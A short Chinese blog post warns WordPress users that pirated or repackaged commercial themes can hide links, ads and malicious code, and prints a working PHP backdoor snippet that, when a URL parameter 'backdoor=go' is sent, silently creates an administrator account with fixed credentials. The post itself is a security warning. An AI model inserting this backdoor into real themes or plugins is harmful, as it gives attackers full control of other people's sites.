WordPress 除了大量官方的主題,還有為數眾多的主題設計者釋出免費和收費主題,很多童鞋經常到處收集主題拿回來測試使用,其中一些無良者將收集到 的國外商業收費主題進行漢化修改,新增暗鏈、廣告,甚至惡意程式碼,然後免費或者收費公開發布出去,誘使別人下載使用,達到不可告人的目的。另外,這些商業 收費主題一般都是測試版本,主題程式碼不完善、功能缺失,個別測試版的商業主題啟用後會自動向資料庫中寫入大量資料.......
下面的程式碼更加邪惡,可以自動新增一個角色為管理員的使用者。
- add_action('wp_head', 'holeinthewall');
- function holeinthewall() {
- If ($_GET['backdoor'] == 'go') {
- require('wp-includes/registration.php');
- If (!username_exists('username')) {
- $user_id = wp_create_user('username', 'password');
- $user = new WP_User($user_id);
- $user->set_role('administrator');
- }
- }
將程式碼新增到您當前主題的 functions.php 檔案或外掛中,會自動建立一個使用者名稱:username 密碼:password 的有管理員許可權的使用者,之後想做什麼都可以了。
所以,這裡奉勸大家還是不要在自己的站點上使用盜版主題和外掛,儘量到官方或原始釋出站點下載主題,以免被開了後門也不知曉!